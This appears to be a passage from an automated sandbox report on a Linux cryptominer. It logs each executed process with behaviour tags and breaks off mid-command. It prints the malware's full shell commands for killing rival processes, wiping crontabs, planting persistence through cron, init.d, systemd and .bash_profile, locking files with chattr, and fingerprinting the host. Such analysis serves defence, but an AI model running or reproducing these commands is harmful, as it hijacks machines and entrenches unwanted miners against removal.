/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Process Discovery
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Process Discovery
-
-
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
-
-
/usr/bin/bashbash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
-
-
-
/usr/bin/chattrchattr -ia /etc/cron.d/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/cron.monthly/.lib-knlib42⤵
- Attempts to change immutable files
-
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵
-
-
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
-
-
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads CPU attributes
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"3⤵
- File and Directory Permissions Modification
- Writes file to tmp directory
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/rmrm -rf /bin/bprofr4⤵
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr4⤵
- Writes file to system bin folder
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"4⤵
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/rmrm -rf /bin/crondr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig4⤵
- Creates/modifies Cron job
- Reads runtime system information
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr4⤵
-
-
/usr/bin/whichwhich chkconfig4⤵
-
-
/usr/bin/whichwhich update-rc.d4⤵
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable4⤵
- Flushes firewall rules
-
/usr/local/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet disable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet disable pwnrig5⤵
- Reads EFI boot settings
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Reads EFI boot settings
-
-
-
/usr/bin/rmrm -rf /bin/initdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/initdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/init.d/pwnrig4⤵
- Modifies init.d
-
-
/usr/bin/chmodchmod +x /etc/init.d/pwnrig /bin/initdr4⤵
- File and Directory Permissions Modification
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/sbin/update-rc.dupdate-rc.d pwnrig enable4⤵
-
/usr/local/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/sbin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/bin/systemctlsystemctl --quiet enable pwnrig5⤵
-
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
-
-
-
/usr/bin/chattrchattr +i +a /etc/init.d/pwnrig /bin/initdr4⤵
-
-
/usr/bin/whichwhich systemctl4⤵
-
-
/usr/bin/chattrchattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
- Attempts to change immutable files
-
-
/usr/bin/rmrm -rf /bin/sysdr4⤵
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/sysdr4⤵
- Writes file to system bin folder
-
-
/usr/bin/teetee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
- Modifies systemd
-
-
/usr/bin/sedsed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service4⤵
-
-
/usr/bin/chattrchattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr4⤵
-
-
/usr/bin/systemctlsystemctl enable pwnrige.service4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl enable pwnrigl.service4⤵
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
-
-
/usr/bin/systemctlsystemctl reload-or-restart pwnrige.service4⤵
- Reads EFI boot settings
-
-
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
-
/usr/bin/hostnamehostname -I4⤵
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \"-\"\$2}"4⤵
-
-
/usr/bin/headhead -n 14⤵
-
-
/usr/bin/grepgrep "Port "4⤵
-
-
/usr/bin/catcat /etc/ssh/sshd_config4⤵
-
-
/usr/bin/whoamiwhoami4⤵
-
-
/usr/bin/hostnamehostname4⤵
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/sedsed -e "s/\$//"4⤵
-
-
/usr/bin/sedsed -e "s/^ *//"4⤵
-
-
/usr/bin/cutcut -d: -f24⤵
-
-
/usr/bin/grepgrep -m 1 "model name" /proc/cpuinfo4⤵
- Checks CPU configuration
-
-
/usr/bin/awkawk "{print \$1}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
/usr/bin/awkawk "{print \$4}"4⤵
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵
-
-
/usr/bin/psps -A "-ostat,ppid"4⤵
-
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/grepgrep /etc/cron4⤵
-
-
/usr/bin/psps x4⤵
- Reads runtime system information
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -v /usr/sbin/httpd4⤵
-
-
/usr/bin/grepgrep -v -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Process Discovery
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"3⤵
- Security Software Discovery
-
/usr/bin/idid -u4⤵
-
-
/usr/bin/wcwc -l4⤵
-
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"4⤵
-
-
/usr/bin/grepgrep -- "-bash[[:space:]]*\$"4⤵
-
-
/usr/bin/grepgrep -v grep4⤵
-
-
/usr/bin/psps aux4⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
-
-
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/usr/bin/pkillpkill -f .klibsystem42⤵
- Reads runtime system information
-
-
/usr/bin/bashbash -c "echo \"* * * * * /home/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵
-
/usr/bin/crontabcrontab -3⤵
- Creates/modifies Cron job
-
-
-
/tmp/sys-helper/tmp/sys-helper2⤵
- Executes dropped EXE
- Writes file to tmp directory
-
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
-
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 